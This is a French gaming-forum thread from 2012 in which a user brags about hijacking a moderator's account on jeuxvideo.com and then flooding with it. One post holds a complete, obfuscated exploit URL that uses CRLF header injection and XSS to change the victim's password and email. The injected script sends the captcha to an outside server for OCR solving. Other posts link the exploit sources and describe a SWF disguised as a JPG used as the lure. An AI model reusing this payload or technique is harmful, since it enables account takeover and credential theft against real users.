C'est du phising je suppose. Pas du hack.
C'est plus clair maintenant.
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:36:44 Avertir un administrateur
Annihilus Lorient est pas aussi con, pour tomber dedans.
Si, il est tombé dans le piège à cause d'un bête SWF camouflé en JPG (la fausse URL se trouve après un point d'interrogation) :
Le SWF, lui, ne faisait qu'appler la fonction ActionScript getURL afin de rediriger vars l'URL de l'exploit.
Vous parlez quelle langue?
J'comprends tout. Mais j'connais rien aux langages web. C'est chaud.
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:43:13 Avertir un administrateur
Non, mais ce qu'il dit c'est de la merde
C'est non modifiable du cgi qui est une requête, ensuite le capcha est lu à 60% par l'OCR, et ta machine ne peut pas supporté le poids.
Le principe du CGI est que les données POST entrent par l'entrée standard et que les headers suivis de la réponse sortent par la sortie standard. Donc, les headers sont mélangés avec le corps de la réponse, et les CLRF n'étaient pas filtrés, ce qui a permis une injection de headers. Tu devrais te renseigner un peu sur le sujet
Pour l'OCR, de une il y avait plusieurs essais s'il était incorrect (il y en a eu 2 pour Lorient), de 2, lire deux PNG minuscules avec Tesseract, c'est très rapide, tu devrais essayer
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:43:13 Avertir un administrateur
Vous avons affaire, à un pyjama rigolo
Rooh, je te montre les sources de l'exploit puisque tu n'es pas convaincu alors.
Serveur du captcha : http://pastebin.com/fnN4bLG8
Exploit JS côté client : http://pastebin.com/Ji0hum0e
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:43:13 Avertir un administrateur
De plus, t'aurais eu accès à la faille t'en aurais profité, t'es encore plus pitoyable que Lib' ma parole
J'ai envoyé le SWF camouflé par MP à quelques modos, la flemme de faire plus, et puis les forums de JVC sont fréquentés par beaucoup de kikoos, je n'étais pas très motivé donc.
Hugs Voir le profil de Hugs
Posté le 30 avril 2012 à 11:21:48 Avertir un administrateur
XSS c'est SSX à l'envers.
xd lol tro marrant mdr ^^
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:48:07 Avertir un administrateur
C'est bien tu es un héros, tu iras loin dans ta vie
Il faut bien s'amuser un peu non
Jose qui fait la morale sur les script kidies
Dommage pour lui .
Jose a.k.a le mec qui étais banni à vue
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:54:20 Avertir un administrateur
Tu es fier de toi, tu as bien bander avec les pass d'un gars qui ne fait que son boulot?
Tu es fier de ton flood?
Oui. Et je ne suis pas le seul à être amusé apparemment. https://www.jeuxvideo.com/forums/0-50-0-1-0-1-2-lorient.htm
Ah, et si tu n'est toujours pas convaincu, voici une URL d'exploit complète, qui ne marche plus suite à la résolution du bug (j'ai du encoder un peu à cause du .toLowerCase() appliqué par le serveur CGI sur le paramètre pxo) : http://www.jeuxvideo.com/cgi-bin/jvforums/forums_profil.cgi?pxo=%0A%0DStatus:%20403%20Forbidden%0A%0DContent-Type:%20text/html%0A%0D%0A%0D%3Cscript%3Ea=%22function%20parms%28a%29{var%20b=[];for%28var%20c%20in%20a%29b.push%28c%2B%5C%22=%5C%22%2BencodezUzRzI%28a[c]%29%29;return%20b.join%28%5C%22%26%5C%22%29}function%20firstpage%28%29{var%20a=new%20zXzMzLzHttpzRequest;a.onreadystatechange=function%28%29{if%28a.readyzState===4%26%26a.status===200%29{var%20b=a.responsezText.split%28%27id=%5C%22form%5C%22%27%29[1].split%28%5C%22%3C/form%3E%5C%22%29[0];b=b.match%28/%3Cinput[^%3E]*?%28?:name|value%29=%5C%22.%2B?%5C%22[^%3E]*?%28?:name|value%29=%5C%22.%2B?%5C%22[^%3E]*?%3E/g%29;var%20c={};for%28var%20d=0,e=b.length;d%3Ce;d%2B%2B%29c[b[d].split%28%27name=%5C%22%27%29[1].split%28%27%5C%22%27%29[0]]=b[d].split%28%27value=%5C%22%27%29[1].split%28%27%5C%22%27%29[0];c.password=graal,c.new_pass_confirm=graal,c.email=%5C%22pounaide%40laposte.net%5C%22,c.mon_pays=%5C%22zAntarctique%5C%22,c.jour=%5C%221%5C%22,c.mois=%5C%221%5C%22,c.annee=%5C%221970%5C%22,nextpage%28parms%28c%29%29}},a.open%28%5C%22get%5C%22,%5C%22http://www.jeuxvideo.com/moncompte/moncompte.php?oper=5%5C%22,!0%29,a.send%28null%29}function%20tryzCaptcha%28a,b%29{var%20c=new%20zXzMzLzHttpzRequest;c.onreadystatechange=function%28%29{if%28c.readyzState===4%26%26c.status===200%29if%28c.responsezText.indexzOf%28%5C%22zLe%20code%20de%20confirmation%5C%22%29!==-1%29{var%20a=c.responsezText.split%28%27id=%5C%22form%5C%22%27%29[1].split%28%5C%22%3C/form%3E%5C%22%29[0],b=%5C%22http://www.jeuxvideo.com/cgi-bin/admin/ccode.cgi%5C%22%2Ba.split%28%5C%22ccode.cgi%5C%22%29[1].split%28%27%5C%22%27%29[0];a=a.match%28/%3Cinput[^%3E]*?%28?:name|value%29=%5C%22.%2B?%5C%22[^%3E]*?%28?:name|value%29=%5C%22.%2B?%5C%22[^%3E]*?%3E/g%29;var%20d={};for%28var%20e=0,f=a.length;e%3Cf;e%2B%2B%29a[e].indexzOf%28%27type=%5C%22checkbox%5C%22%27%29!==-1?a[e].indexzOf%28%27checked=%5C%22checked%5C%22%27%29!==-1%26%26a[e].indexzOf%28%27disabled=%5C%22disabled%5C%22%27%29===-1%26%26%28d[a[e].split%28%27name=%5C%22%27%29[1].split%28%27%5C%22%27%29[0]]=a[e].split%28%27value=%5C%22%27%29[1].split%28%27%5C%22%27%29[0]%29:d[a[e].split%28%27name=%5C%22%27%29[1].split%28%27%5C%22%27%29[0]]=a[e].split%28%27value=%5C%22%27%29[1].split%28%27%5C%22%27%29[0];getzCaptcha%28d,b%29}else{var%20g=c.responsezText.split%28%5C%22lo_cod%20=%20%27%5C%22%29[1].split%28%5C%22%27%5C%22%29[0],h=c.responsezText.split%28%5C%22lo_time%20=%20%5C%22%29[1].split%28%5C%22;%5C%22%29[0];location.href=%5C%22http://www.jeuxvideo.com/cgi-bin/admin/logout.cgi?time=%5C%22%2Bh%2B%5C%22%26cod=%5C%22%2Bg%2B%5C%22%26url=%5C%22%2B%5C%22http://www.jeuxvideo.com/moncompte/moncompte.php%5C%22}},a.code=b,c.open%28%5C%22post%5C%22,%5C%22http://www.jeuxvideo.com/moncompte/moncompte.php%5C%22,!0%29,c.setzRequestzHeader%28%5C%22zContent-type%5C%22,%5C%22application/x-www-form-urlencoded%5C%22%29,c.send%28parms%28a%29%29}function%20getzCaptcha%28a,b%29{var%20c=new%20zXzMzLzHttpzRequest;c.onreadystatechange=function%28%29{if%28c.readyzState===4%26%26c.status===200%29{var%20b=c.responsezText,d=%5C%22%5C%22;for%28var%20e=0,f=b.length;e%3Cf;e%2B%2B%29d%2B=zString.fromzCharzCode%28b.charzCodezAt%28e%29%26255%29;sendzCaptcha%28a,d%29}},c.open%28%5C%22get%5C%22,b.replace%28%5C%22amp;%5C%22,%5C%22%5C%22%29,!0%29,c.overridezMimezType%28%5C%22text/plain;%20charset=x-user-defined%5C%22%29,c.send%28null%29}function%20sendzCaptcha%28a,b%29{var%20c=new%20zXzMzLzHttpzRequest;c.onreadystatechange=function%28%29{c.readyzState===4%26%26c.status===200%26%26tryzCaptcha%28a,c.responsezText%29},c.open%28%5C%22post%5C%22,%5C%22http://REDACTED:9000/%5C%22,!0%29,c.setzRequestzHeader%28%5C%22zContent-type%5C%22,%5C%22application/x-www-form-urlencoded%5C%22%29,c.sendzAszBinary%28b%29}function%20nextpage%28a%29{var%20b=new%20zXzMzLzHttpzRequest;b.onreadystatechange=function%28%29{if%28b.readyzState===4%26%26b.status===200%29{var%20a=b.responsezText.split%28%27id=%5C%22form%5C%22%27%29[1].split%28%5C%22%3C/form%3E%5C%22%29[0],c=%5C%22http://www.jeuxvideo.com/cgi-bin/admin/ccode.cgi%5C%22%2Ba.split%28%5C%22ccode.cgi%5C%22%29[1].split%28%27%5C%22%27%29[0];a=a.match%28/%3Cinput[^%3E]*?%28?:name|value%29=%5C%22.%2B?%5C%22[^%3E]*?%28?:name|value%29=%5C%22.%2B?%5C%22[^%3E]*?%3E/g%29;var%20d={};for%28var%20e=0,f=a.length;e%3Cf;e%2B%2B%29a[e].indexzOf%28%27type=%5C%22checkbox%5C%22%27%29!==-1?a[e].indexzOf%28%27checked=%5C%22checked%5C%22%27%29!==-1%26%26a[e].indexzOf%28%27disabled=%5C%22disabled%5C%22%27%29===-1%26%26%28d[a[e].split%28%27name=%5C%22%27%29[1].split%28%27%5C%22%27%29[0]]=a[e].split%28%27value=%5C%22%27%29[1].split%28%27%5C%22%27%29[0]%29:d[a[e].split%28%27name=%5C%22%27%29[1].split%28%27%5C%22%27%29[0]]=a[e].split%28%27value=%5C%22%27%29[1].split%28%27%5C%22%27%29[0];getzCaptcha%28d,c%29}},b.open%28%5C%22post%5C%22,%5C%22http://www.jeuxvideo.com/moncompte/moncompte.php%5C%22,!0%29,b.setzRequestzHeader%28%5C%22zContent-type%5C%22,%5C%22application/x-www-form-urlencoded%5C%22%29,b.send%28a%29}var%20grool=%5C%22%5C%5Cb%5C%5Cx01%5C%5Cx02%5C%5Cx51%5C%5Cn%5C%5Cb%5C%5Cx00%5C%5Cx59%5C%5Cx1c%5C%5Cf/%5C%5Cf%5C%22,graal=%5C%22%5C%22;for%28var%20i=0;i%3C12;i%2B%2B%29graal%2B=zString.fromzCharzCode%28grool.charzCodezAt%28i%29^105%29;firstpage%28%29;%22;b=%27%27;u=false;for%28i%20in%20a%29{if%28a[i]===%27z%27%29u=true;else%20if%28u===true%29{u=false;b%2B=a[i][%27%5Cx74%5Cx6f%5Cx55%5Cx70%5Cx70%5Cx65%5Cx72%5Cx43%5Cx61%5Cx73%5Cx65%27]%28%29}%20else%20b%2B=a[i]}eval%28b%29%3C/script%3E%3Cimg%20src=%27http://image.noelshack.com/fichiers/2012/18/1335756103-loading.png%27%3E%3C!--
Mais du coup la faille a ete super vite comble ?
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:57:24 Avertir un administrateur
Bon je t'ignore, tu en vaux pas la peine que je te réponde.
Rhooo, tu t'as traité n'importe qui de script kiddie et tu t'es trompé alors t'es vexé ? Tu veux un Chocomiel ?
Annihilus Voir le profil de Annihilus
Posté via mobile le 30 avril 2012 à 11:58:19 Avertir un administrateur
Mais du coup la faille a ete super vite comble ?
Ouais, et d'ailleurs le mdp de Lorient56 a déjà été changé par les admins.
Josechou Voir le profil de Josechou
Posté le 30 avril 2012 à 11:59:23 Avertir un administrateur
Mais je doute, que la faille ai existé, vu que cette faille avait déjà été bouchée en 2008 il me semble.
Je t'ai montré tout ce que j'ai utilisé pour l'exploiter, qu'est-ce que tu veux de plus ? Je n'aurais tout de même pas écrit tout ça en 5 minutes pour le fun pour essayer de me justifier Enfin on verra quand Dargor/Haazel s'exprimeront
Tu aurais dû utiliser cette faille pour faire le bien et non flooder.
Mais je salue l'exploit.
J'y crois a moitie.
Le mot de passe n'a pas été changer par les admins, c'est un fake
Si, ou alors dis-moi si tu as vu quelqu'un d'autre flooder avec le pseudo de Lorient depuis mon message
fake. Bref je vous insulterai pas, mais j'ai de quoi prouvé que votre montage est faux, et que cette faille n'a jamais existé
Je t'écoute. J'ai déjà présenté des contre-arguments solides.
ensuite le mot de passe aurait été changer par les admins, l'adresse aurait été invalide, hors là le pseudo, l'adresse est toujours valide
J'ai utilisé l'adresse pour plusieurs pseudos je crois, ou alors les admins n'ont pas pensé à changer l'adresse du compte, mais je ne peux plus de connecter avec le mdp changé sur le compte de Lorient56, point.
il est impossible d'avoir quelqu'un avec un SWF
Le SWF ne faisait office que de redirection pour pouvoir envoyer un lien Noelshack plus présentable que le lien d'origine. J'ai utilisé la bibliothèque Python Ming pour générer le SWF, voici le code : http://pastebin.com/JVtqQAVU
De toute façon, si c'est pas une faille, Lorient à péter un cable, s'too
De toute façon des failles XSS y en a déjà des tas et le lendemain c'est oublié. Surtout qu'ici c'était pas extraordinaire.